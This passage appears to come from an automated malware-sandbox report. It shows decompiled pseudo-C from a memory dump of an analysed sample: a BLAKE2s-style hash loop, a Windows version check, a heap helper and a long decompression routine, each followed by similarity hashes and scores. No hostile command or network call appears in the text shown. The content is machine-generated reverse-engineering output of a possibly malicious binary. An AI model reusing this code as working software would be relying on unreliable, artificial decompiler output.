                                                                            				_push(8);
                                                                            				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
                                                                            				_t437 = _t436 + 0xc;
                                                                            				_t418 =  *_t230 ^ 0x510e527f;
                                                                            				_t231 =  *(_t377 + 0xfc);
                                                                            				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
                                                                            				_t334 =  *(_t437 + 0x64);
                                                                            				 *(_t437 + 0x28) = 0x6a09e667;
                                                                            				 *(_t437 + 0x30) = 0xbb67ae85;
                                                                            				_t379 =  *_t231 ^ 0x1f83d9ab;
                                                                            				_t348 =  *(_t437 + 0x5c);
                                                                            				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
                                                                            				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
                                                                            				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
                                                                            				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
                                                                            				 *(_t437 + 0x38) =  *(_t437 + 0x54);
                                                                            				 *(_t437 + 0x20) =  *(_t437 + 0x50);
                                                                            				 *((intOrPtr*)(_t437 + 0x10)) = 0;
                                                                            				 *((intOrPtr*)(_t437 + 0x48)) = 0;
                                                                            				_t427 =  *(_t437 + 0x44);
                                                                            				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
                                                                            				_t240 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            				 *(_t437 + 0x24) = 0xa54ff53a;
                                                                            				 *(_t437 + 0x40) = _t334;
                                                                            				 *(_t437 + 0x34) = _t348;
                                                                            				do {
                                                                            					_t37 = _t240 + 0x1c23b0; // 0x3020100
                                                                            					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
                                                                            					 *(_t437 + 0x14) = _t350;
                                                                            					_t351 = _t350 ^ _t418;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t245 =  *(_t437 + 0x28) + _t351;
                                                                            					_t420 =  *(_t437 + 0x34) ^ _t245;
                                                                            					 *(_t437 + 0x28) = _t245;
                                                                            					_t246 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror esi, 0xc");
                                                                            					 *(_t437 + 0x34) = _t420;
                                                                            					_t48 = _t246 + 0x1c23b1; // 0x4030201
                                                                            					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
                                                                            					 *(_t437 + 0x14) = _t422;
                                                                            					_t423 = _t422 ^ _t351;
                                                                            					asm("ror esi, 0x8");
                                                                            					_t353 =  *(_t437 + 0x28) + _t423;
                                                                            					 *(_t437 + 0x28) = _t353;
                                                                            					asm("ror eax, 0x7");
                                                                            					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
                                                                            					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1c23b2; // 0x5040302
                                                                            					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
                                                                            					 *(_t437 + 0x20) = _t355;
                                                                            					_t356 = _t355 ^ _t407;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t257 =  *(_t437 + 0x30) + _t356;
                                                                            					_t409 =  *(_t437 + 0x1c) ^ _t257;
                                                                            					 *(_t437 + 0x30) = _t257;
                                                                            					_t258 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edi, 0xc");
                                                                            					 *(_t437 + 0x1c) = _t409;
                                                                            					_t71 = _t258 + 0x1c23b3; // 0x6050403
                                                                            					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
                                                                            					 *(_t437 + 0x20) = _t411;
                                                                            					_t412 = _t411 ^ _t356;
                                                                            					asm("ror edi, 0x8");
                                                                            					_t358 =  *(_t437 + 0x30) + _t412;
                                                                            					 *(_t437 + 0x30) = _t358;
                                                                            					asm("ror eax, 0x7");
                                                                            					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
                                                                            					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x1c23b4; // 0x7060504
                                                                            					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
                                                                            					_t360 = _t336 ^ _t379;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t269 =  *(_t437 + 0x18) + _t360;
                                                                            					_t381 =  *(_t437 + 0x40) ^ _t269;
                                                                            					 *(_t437 + 0x18) = _t269;
                                                                            					_t270 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edx, 0xc");
                                                                            					_t91 = _t270 + 0x1c23b5; // 0x8070605
                                                                            					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
                                                                            					 *(_t437 + 0x38) = _t337;
                                                                            					_t338 = _t337 ^ _t360;
                                                                            					asm("ror ebx, 0x8");
                                                                            					_t275 =  *(_t437 + 0x18) + _t338;
                                                                            					 *(_t437 + 0x18) = _t275;
                                                                            					asm("ror edx, 0x7");
                                                                            					 *(_t437 + 0x40) = _t381 ^ _t275;
                                                                            					_t383 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					_t101 = _t383 + 0x1c23b6; // 0x9080706
                                                                            					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
                                                                            					 *(_t437 + 0x2c) = _t362;
                                                                            					_t363 = _t362 ^ _t427;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t280 =  *(_t437 + 0x24) + _t363;
                                                                            					_t429 =  *(_t437 + 0x3c) ^ _t280;
                                                                            					 *(_t437 + 0x24) = _t280;
                                                                            					_t110 = _t383 + 0x1c23b7; // 0xa090807
                                                                            					asm("ror ebp, 0xc");
                                                                            					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
                                                                            					 *(_t437 + 0x2c) = _t385;
                                                                            					_t386 = _t385 ^ _t363;
                                                                            					asm("ror edx, 0x8");
                                                                            					_t285 =  *(_t437 + 0x24) + _t386;
                                                                            					 *(_t437 + 0x24) = _t285;
                                                                            					asm("ror ebp, 0x7");
                                                                            					 *(_t437 + 0x3c) = _t429 ^ _t285;
                                                                            					_t431 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					_t121 = _t431 + 0x1c23b8; // 0xb0a0908
                                                                            					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
                                                                            					 *(_t437 + 0x14) = _t365;
                                                                            					_t366 = _t365 ^ _t386;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t290 =  *(_t437 + 0x18) + _t366;
                                                                            					_t388 =  *(_t437 + 0x1c) ^ _t290;
                                                                            					 *(_t437 + 0x18) = _t290;
                                                                            					_t130 = _t431 + 0x1c23b9; // 0xc0b0a09
                                                                            					asm("ror edx, 0xc");
                                                                            					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
                                                                            					 *(_t437 + 0x14) = _t433;
                                                                            					 *(_t437 + 0x4c) = _t433;
                                                                            					_t427 = _t433 ^ _t366;
                                                                            					asm("ror ebp, 0x8");
                                                                            					_t295 =  *(_t437 + 0x18) + _t427;
                                                                            					_t389 = _t388 ^ _t295;
                                                                            					 *(_t437 + 0x18) = _t295;
                                                                            					 *(_t437 + 0x74) = _t295;
                                                                            					_t296 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edx, 0x7");
                                                                            					 *(_t437 + 0x1c) = _t389;
                                                                            					 *(_t437 + 0x60) = _t389;
                                                                            					_t144 = _t296 + 0x1c23ba; // 0xd0c0b0a
                                                                            					_t390 =  *(_t437 + 0x40);
                                                                            					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
                                                                            					 *(_t437 + 0x20) = _t368;
                                                                            					_t369 = _t368 ^ _t423;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t301 =  *(_t437 + 0x24) + _t369;
                                                                            					_t391 = _t390 ^ _t301;
                                                                            					 *(_t437 + 0x24) = _t301;
                                                                            					_t302 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edx, 0xc");
                                                                            					_t154 = _t302 + 0x1c23bb; // 0xe0d0c0b
                                                                            					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
                                                                            					 *(_t437 + 0x20) = _t425;
                                                                            					 *(_t437 + 0x50) = _t425;
                                                                            					_t418 = _t425 ^ _t369;
                                                                            					asm("ror esi, 0x8");
                                                                            					_t307 =  *(_t437 + 0x24) + _t418;
                                                                            					_t392 = _t391 ^ _t307;
                                                                            					 *(_t437 + 0x24) = _t307;
                                                                            					 *(_t437 + 0x78) = _t307;
                                                                            					_t308 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edx, 0x7");
                                                                            					 *(_t437 + 0x40) = _t392;
                                                                            					 *(_t437 + 0x64) = _t392;
                                                                            					_t167 = _t308 + 0x1c23bc; // 0xf0e0d0c
                                                                            					_t393 =  *(_t437 + 0x3c);
                                                                            					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
                                                                            					 *(_t437 + 0x38) = _t371;
                                                                            					_t372 = _t371 ^ _t412;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t313 =  *(_t437 + 0x28) + _t372;
                                                                            					_t394 = _t393 ^ _t313;
                                                                            					 *(_t437 + 0x28) = _t313;
                                                                            					_t314 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					asm("ror edx, 0xc");
                                                                            					_t177 = _t314 + 0x1c23bd; // 0xe0f0e0d
                                                                            					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
                                                                            					 *(_t437 + 0x38) = _t414;
                                                                            					 *(_t437 + 0x54) = _t414;
                                                                            					_t407 = _t414 ^ _t372;
                                                                            					asm("ror edi, 0x8");
                                                                            					_t319 =  *(_t437 + 0x28) + _t407;
                                                                            					_t395 = _t394 ^ _t319;
                                                                            					 *(_t437 + 0x28) = _t319;
                                                                            					asm("ror edx, 0x7");
                                                                            					 *(_t437 + 0x3c) = _t395;
                                                                            					 *(_t437 + 0x68) = _t395;
                                                                            					_t396 =  *((intOrPtr*)(_t437 + 0x10));
                                                                            					 *(_t437 + 0x6c) = _t319;
                                                                            					_t190 = _t396 + 0x1c23be; // 0xa0e0f0e
                                                                            					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
                                                                            					 *(_t437 + 0x2c) = _t374;
                                                                            					_t375 = _t374 ^ _t338;
                                                                            					asm("rol ecx, 0x10");
                                                                            					_t324 =  *(_t437 + 0x30) + _t375;
                                                                            					_t340 =  *(_t437 + 0x34) ^ _t324;
                                                                            					 *(_t437 + 0x30) = _t324;
                                                                            					_t199 = _t396 + 0x1c23bf; // 0x40a0e0f
                                                                            					asm("ror ebx, 0xc");
                                                                            					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
                                                                            					 *(_t437 + 0x2c) = _t398;
                                                                            					 *(_t437 + 0x58) = _t398;
                                                                            					_t379 = _t398 ^ _t375;
                                                                            					asm("ror edx, 0x8");
                                                                            					_t329 =  *(_t437 + 0x30) + _t379;
                                                                            					_t341 = _t340 ^ _t329;
                                                                            					 *(_t437 + 0x30) = _t329;
                                                                            					 *(_t437 + 0x70) = _t329;
                                                                            					asm("ror ebx, 0x7");
                                                                            					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
                                                                            					 *(_t437 + 0x34) = _t341;
                                                                            					_t348 =  *(_t437 + 0x34);
                                                                            					 *(_t437 + 0x5c) = _t341;
                                                                            					_t334 =  *(_t437 + 0x40);
                                                                            					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
                                                                            				} while (_t240 <= 0x90);
                                                                            				 *(_t437 + 0x84) = _t379;
                                                                            				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
                                                                            				 *(_t437 + 0x88) = _t427;
                                                                            				_t434 =  *((intOrPtr*)(_t437 + 0x48));
                                                                            				 *(_t437 + 0x7c) = _t418;
                                                                            				 *(_t437 + 0x80) = _t407;
                                                                            				do {
                                                                            					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
                                                                            					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
                                                                            					 *(_t376 + _t434) = _t333;
                                                                            					_t434 = _t434 + 4;
                                                                            				} while (_t434 < 0x20);
                                                                            				return _t333;
                                                                            			}


























































































                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: gj
                                                                            • API String ID: 0-4203073231
                                                                            • Opcode ID: 758ab3fae1d7cc771be7332ac461b154ef0cf6c062960e095a2a339769122a70
                                                                            • Instruction ID: cc799eba3e61a21ab2204155f6a754e6b31d9136d28c277796414c0869e6b809
                                                                            • Opcode Fuzzy Hash: 758ab3fae1d7cc771be7332ac461b154ef0cf6c062960e095a2a339769122a70
                                                                            • Instruction Fuzzy Hash: A0F1D3B1A083818FC748CF29D880A1AFBE1BFCC208F19992EF498D7711D734E9458B56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019A995() {
                                                                            				struct _OSVERSIONINFOW _v280;
                                                                            				signed int _t6;
                                                                            				intOrPtr _t12;
                                                                            				intOrPtr _t13;
                                                                            
                                                                            				_t12 =  *0x1cd020; // 0x2
                                                                            				if(_t12 != 0xffffffff) {
                                                                            					_t6 =  *0x1d00f0; // 0xa
                                                                            					_t13 =  *0x1d00f4; // 0x0
                                                                            				} else {
                                                                            					_v280.dwOSVersionInfoSize = 0x114;
                                                                            					GetVersionExW( &_v280);
                                                                            					_t12 = _v280.dwPlatformId;
                                                                            					_t6 = _v280.dwMajorVersion;
                                                                            					_t13 = _v280.dwMinorVersion;
                                                                            					 *0x1cd020 = _t12;
                                                                            					 *0x1d00f0 = _t6;
                                                                            					 *0x1d00f4 = _t13;
                                                                            				}
                                                                            				if(_t12 != 2) {
                                                                            					return 0x501;
                                                                            				} else {
                                                                            					return (_t6 << 8) + _t13;
                                                                            				}
                                                                            			}








                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0019A9BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: 15b4ca64351e5186e4f05bc8c6cc88aa9c30f6fad454f1260bbebffadc3098a1
                                                                            • Instruction ID: 477c8883b5cde507690988c711d2539914dada0a422e260ddf948c2d8b21c125
                                                                            • Opcode Fuzzy Hash: 15b4ca64351e5186e4f05bc8c6cc88aa9c30f6fad454f1260bbebffadc3098a1
                                                                            • Instruction Fuzzy Hash: B1F030B19422188BCB28CB18ED41BE97BB5FB59314F60429AEE1543750E370ADC4DE91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001BACA1() {
                                                                            				signed int _t3;
                                                                            
                                                                            				_t3 = GetProcessHeap();
                                                                            				 *0x1f0874 = _t3;
                                                                            				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                            			}





                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E001A589E(intOrPtr __esi) {
                                                                            				signed int _t314;
                                                                            				signed int _t315;
                                                                            				signed int _t316;
                                                                            				signed int _t318;
                                                                            				signed int _t319;
                                                                            				signed int _t320;
                                                                            				signed int _t321;
                                                                            				signed int _t322;
                                                                            				signed int _t324;
                                                                            				signed int _t325;
                                                                            				signed int _t326;
                                                                            				void* _t328;
                                                                            				intOrPtr _t333;
                                                                            				signed int _t347;
                                                                            				char _t356;
                                                                            				unsigned int _t359;
                                                                            				void* _t366;
                                                                            				intOrPtr _t371;
                                                                            				signed int _t381;
                                                                            				char _t390;
                                                                            				unsigned int _t391;
                                                                            				void* _t399;
                                                                            				intOrPtr _t400;
                                                                            				signed int _t403;
                                                                            				char _t412;
                                                                            				signed int _t414;
                                                                            				intOrPtr _t415;
                                                                            				signed int _t417;
                                                                            				signed int _t418;
                                                                            				signed int _t419;
                                                                            				signed int _t420;
                                                                            				signed int _t422;
                                                                            				signed int _t423;
                                                                            				signed short _t424;
                                                                            				signed int _t425;
                                                                            				signed int _t428;
                                                                            				signed int _t429;
                                                                            				signed int _t430;
                                                                            				signed int _t431;
                                                                            				signed int _t433;
                                                                            				signed int _t434;
                                                                            				signed short _t435;
                                                                            				unsigned int _t439;
                                                                            				unsigned int _t444;
                                                                            				signed int _t458;
                                                                            				signed int _t460;
                                                                            				signed int _t461;
                                                                            				signed int _t464;
                                                                            				signed int _t466;
                                                                            				signed int _t468;
                                                                            				signed int _t471;
                                                                            				signed int _t472;
                                                                            				signed int _t473;
                                                                            				intOrPtr* _t474;
                                                                            				signed int _t478;
                                                                            				signed int _t479;
                                                                            				intOrPtr _t483;
                                                                            				unsigned int _t486;
                                                                            				void* _t488;
                                                                            				signed int _t491;
                                                                            				signed int* _t493;
                                                                            				unsigned int _t496;
                                                                            				void* _t498;
                                                                            				signed int _t501;
                                                                            				signed int _t503;
                                                                            				signed int _t511;
                                                                            				void* _t514;
                                                                            				signed int _t517;
                                                                            				signed int _t519;
                                                                            				signed int _t522;
                                                                            				void* _t525;
                                                                            				signed int _t528;
                                                                            				signed int _t529;
                                                                            				intOrPtr* _t531;
                                                                            				void* _t532;
                                                                            				signed int _t535;
                                                                            				signed int _t537;
                                                                            				signed int _t539;
                                                                            				unsigned int _t546;
                                                                            				void* _t548;
                                                                            				signed int _t551;
                                                                            				unsigned int _t555;
                                                                            				void* _t557;
                                                                            				signed int _t560;
                                                                            				intOrPtr* _t562;
                                                                            				void* _t563;
                                                                            				signed int _t566;
                                                                            				void* _t569;
                                                                            				signed int _t572;
                                                                            				intOrPtr* _t575;
                                                                            				void* _t576;
                                                                            				signed int _t579;
                                                                            				void* _t582;
                                                                            				signed int _t585;
                                                                            				signed int _t586;
                                                                            				intOrPtr* _t591;
                                                                            				void* _t592;
                                                                            				signed int _t595;
                                                                            				signed int* _t598;
                                                                            				unsigned int _t600;
                                                                            				signed int _t603;
                                                                            				unsigned int _t605;
                                                                            				signed int _t608;
                                                                            				void* _t611;
                                                                            				signed int _t613;
                                                                            				signed int _t614;
                                                                            				void* _t615;
                                                                            				unsigned int _t617;
                                                                            				unsigned int _t621;
                                                                            				signed int _t624;
                                                                            				signed int _t625;
                                                                            				signed int _t626;
                                                                            				signed int _t627;
                                                                            				signed int _t628;
                                                                            				signed int _t629;
                                                                            				unsigned int _t632;
                                                                            				signed int _t634;
                                                                            				intOrPtr* _t637;
                                                                            				intOrPtr _t638;
                                                                            				signed int _t639;
                                                                            				signed int _t640;
                                                                            				signed int _t641;
                                                                            				signed int _t643;
                                                                            				signed int _t644;
                                                                            				signed int _t645;
                                                                            				char* _t646;
                                                                            				signed int _t648;
                                                                            				signed int _t649;
                                                                            				signed int _t651;
                                                                            				char* _t652;
                                                                            				intOrPtr* _t656;
                                                                            				signed int _t657;
                                                                            				void* _t658;
                                                                            				void* _t661;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t638 = __esi;
                                                                            					_t598 = __esi + 0x7c;
                                                                            					while(1) {
                                                                            						L1:
                                                                            						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                                                                            						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                                                                            							goto L12;
                                                                            						} else {
                                                                            							_t637 = _t638 + 0x8c;
                                                                            						}
                                                                            						while(1) {
                                                                            							L3:
                                                                            							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
                                                                            							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
                                                                            								break;
                                                                            							}
                                                                            							L6:
                                                                            							if( *((char*)(_t638 + 0x9c)) != 0) {
                                                                            								L99:
                                                                            								_t415 = E001A47DA(_t638);
                                                                            								L100:
                                                                            								return _t415;
                                                                            							}
                                                                            							L7:
                                                                            							_push(_t637);
                                                                            							_push(_t643);
                                                                            							_t415 = E001A33D3(_t638);
                                                                            							if(_t415 == 0) {
                                                                            								goto L100;
                                                                            							}
                                                                            							L8:
                                                                            							_push(_t638 + 0xa0);
                                                                            							_push(_t637);
                                                                            							_push(_t643);
                                                                            							_t415 = E001A397F(_t638);
                                                                            							if(_t415 != 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								goto L100;
                                                                            							}
                                                                            						}
                                                                            						L10:
                                                                            						_t458 = E001A4422(_t638);
                                                                            						__eflags = _t458;
                                                                            						if(_t458 == 0) {
                                                                            							goto L99;
                                                                            						} else {
                                                                            							_t598 = _t638 + 0x7c;
                                                                            						}
                                                                            						L12:
                                                                            						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
                                                                            						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
                                                                            						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
                                                                            							L18:
                                                                            							_t314 = E0019A4ED(_t643);
                                                                            							_t315 =  *(_t638 + 0x124);
                                                                            							_t600 = _t314 & 0x0000fffe;
                                                                            							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
                                                                            							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
                                                                            								L20:
                                                                            								_t627 = 0xf;
                                                                            								_t316 = _t315 + 1;
                                                                            								__eflags = _t316 - _t627;
                                                                            								if(_t316 >= _t627) {
                                                                            									L26:
                                                                            									_t486 =  *(_t643 + 4) + _t627;
                                                                            									 *(_t643 + 4) = _t486 & 0x00000007;
                                                                            									_t318 = _t486 >> 3;
                                                                            									 *_t643 =  *_t643 + _t318;
                                                                            									_t488 = 0x10;
                                                                            									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
                                                                            									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
                                                                            									asm("sbb eax, eax");
                                                                            									_t319 = _t318 & _t491;
                                                                            									__eflags = _t319;
                                                                            									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
                                                                            									goto L27;
                                                                            								} else {
                                                                            									_t591 = _t638 + (_t316 + 0x29) * 4;
                                                                            									while(1) {
                                                                            										L22:
                                                                            										__eflags = _t600 -  *_t591;
                                                                            										if(_t600 <  *_t591) {
                                                                            											_t627 = _t316;
                                                                            											goto L26;
                                                                            										}
                                                                            										L23:
                                                                            										_t316 = _t316 + 1;
                                                                            										_t591 = _t591 + 4;
                                                                            										__eflags = _t316 - 0xf;
                                                                            										if(_t316 < 0xf) {
                                                                            											continue;
                                                                            										} else {
                                                                            											goto L26;
                                                                            										}
                                                                            									}
                                                                            									goto L26;
                                                                            								}
                                                                            							} else {
                                                                            								_t592 = 0x10;
                                                                            								_t626 = _t600 >> _t592 - _t315;
                                                                            								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
                                                                            								 *_t643 =  *_t643 + (_t595 >> 3);
                                                                            								 *(_t643 + 4) = _t595 & 0x00000007;
                                                                            								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
                                                                            								L27:
                                                                            								__eflags = _t460 - 0x100;
                                                                            								if(_t460 >= 0x100) {
                                                                            									L31:
                                                                            									__eflags = _t460 - 0x106;
                                                                            									if(_t460 < 0x106) {
                                                                            										L96:
                                                                            										__eflags = _t460 - 0x100;
                                                                            										if(_t460 != 0x100) {
                                                                            											L102:
                                                                            											__eflags = _t460 - 0x101;
                                                                            											if(_t460 != 0x101) {
                                                                            												L129:
                                                                            												_t461 = _t460 + 0xfffffefe;
                                                                            												__eflags = _t461;
                                                                            												_t493 = _t638 + (_t461 + 0x18) * 4;
                                                                            												_t603 =  *_t493;
                                                                            												 *(_t658 + 0x30) = _t603;
                                                                            												if(_t461 == 0) {
                                                                            													L131:
                                                                            													 *(_t638 + 0x60) = _t603;
                                                                            													_t320 = E0019A4ED(_t643);
                                                                            													_t321 =  *(_t638 + 0x2de8);
                                                                            													_t605 = _t320 & 0x0000fffe;
                                                                            													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
                                                                            													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
                                                                            														L133:
                                                                            														_t628 = 0xf;
                                                                            														_t322 = _t321 + 1;
                                                                            														__eflags = _t322 - _t628;
                                                                            														if(_t322 >= _t628) {
                                                                            															L139:
                                                                            															_t496 =  *(_t643 + 4) + _t628;
                                                                            															 *(_t643 + 4) = _t496 & 0x00000007;
                                                                            															_t324 = _t496 >> 3;
                                                                            															 *_t643 =  *_t643 + _t324;
                                                                            															_t498 = 0x10;
                                                                            															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
                                                                            															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
                                                                            															asm("sbb eax, eax");
                                                                            															_t325 = _t324 & _t501;
                                                                            															__eflags = _t325;
                                                                            															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
                                                                            															L140:
                                                                            															_t629 = _t326 & 0x0000ffff;
                                                                            															__eflags = _t629 - 8;
                                                                            															if(_t629 >= 8) {
                                                                            																_t464 = (_t629 >> 2) - 1;
                                                                            																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
                                                                            																__eflags = _t629;
                                                                            															} else {
                                                                            																_t464 = 0;
                                                                            															}
                                                                            															_t632 = _t629 + 2;
                                                                            															__eflags = _t464;
                                                                            															if(_t464 != 0) {
                                                                            																_t391 = E0019A4ED(_t643);
                                                                            																_t525 = 0x10;
                                                                            																_t632 = _t632 + (_t391 >> _t525 - _t464);
                                                                            																_t528 =  *(_t643 + 4) + _t464;
                                                                            																 *_t643 =  *_t643 + (_t528 >> 3);
                                                                            																_t529 = _t528 & 0x00000007;
                                                                            																__eflags = _t529;
                                                                            																 *(_t643 + 4) = _t529;
                                                                            															}
                                                                            															__eflags =  *((char*)(_t638 + 0x4c44));
                                                                            															_t608 =  *(_t658 + 0x30);
                                                                            															 *(_t638 + 0x74) = _t632;
                                                                            															if( *((char*)(_t638 + 0x4c44)) == 0) {
                                                                            																L147:
                                                                            																_t503 =  *(_t638 + 0x7c);
                                                                            																_t466 = _t503 - _t608;
                                                                            																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                                                                            																__eflags = _t466 - _t328;
                                                                            																if(_t466 >= _t328) {
                                                                            																	L158:
                                                                            																	__eflags = _t632;
                                                                            																	if(_t632 == 0) {
                                                                            																		while(1) {
                                                                            																			L0:
                                                                            																			_t638 = __esi;
                                                                            																			_t598 = __esi + 0x7c;
                                                                            																			goto L1;
                                                                            																		}
                                                                            																	}
                                                                            																	L159:
                                                                            																	_t644 =  *(_t638 + 0xe6dc);
                                                                            																	do {
                                                                            																		L160:
